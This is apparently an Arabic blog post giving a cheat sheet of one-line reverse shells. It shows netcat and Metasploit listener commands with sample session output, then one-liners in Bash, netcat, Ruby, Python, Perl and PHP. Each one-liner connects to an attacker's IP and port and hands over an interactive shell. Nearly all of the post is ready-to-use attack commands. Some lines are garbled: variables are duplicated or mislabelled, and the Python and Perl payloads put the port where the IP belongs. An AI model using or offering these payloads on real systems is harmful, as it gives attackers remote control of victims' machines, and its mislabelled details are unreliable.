انشاء اتصال عكسي من سطر واحد وبعدة لغات
السلام عليكم و رحمة الله .
هذه معاني المتغيرات التي ستجدها في الشرح. استبدلها عند التطبيق.
$ATTCKER_IP: هو عنواد المهاجم
$ATTACKER_PORT: هو المنفذ الذي ينصت عليه الضحية
$ATTCKER_IP: هو عنواد المهاجم
$ATTACKER_PORT: هو المنفذ الذي ينصت عليه الضحية
$VICTIM_IP: هو عنواد المهاجم
$VICTIM_PORT: هو المنفذ الذي ينصت عليه الضحية
$VICTIM_PORT: هو المنفذ الذي ينصت عليه الضحية
Listining
تستطيع الإنصات بأي طريقة تحبها
- NetCat
1 | nc -lvp $ATTACKER_PORT |
أو
1 | ncat -lvp $ATTACKER_PORT |
- Metasploit
1 | ./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=$ATTCKER_IP LPORT=$ATTACKER_PORT E |
1 2 3 4 5 6 7 8 | PAYLOAD => windows/shell/reverse_tcp LHOST => $ATTCKER_IP LPORT => $ATTCKER_PORT [*] Started reverse handler on $ATTCKER_IP:$ATTCKER_PORT [*] Starting the payload handler... [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to $VICTIM_IP [*] Command shell session 1 opened ($ATTCKER_IP:$ATTCKER_PORT -> $VICTIM_IP:47657) |
Reverse connection
Bash
1 | bash -i >& /dev/tcp/$ATTCKER_IP/$ATTCKER_PORT 0>&1 |
NetCat
1 | nc -nvv $ATTCKER_IP $ATTCKER_PORT -e /bin/bash |
أو
1 | nc -c /bin/sh $ATTCKER_IP $ATTCKER_PORT |
Ruby
1 | ruby -r socket -e ' f=TCPSocket.open("$ATTCKER_IP",$ATTCKER_PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' |
Python
1 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ATTCKER_PORT",$ATTCKER_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' |
Perl
1 | perl -e 'use Socket;$i="$ATTCKER_PORT";$p=$ATTCKER_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))) {open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' |
Php
1 | php -r '$sock=fsockopen("$ATTACKER_IP",$ATTACKER_PORT);exec("/bin/sh -i <&3 >&3 2>&3");' |
Post a Comment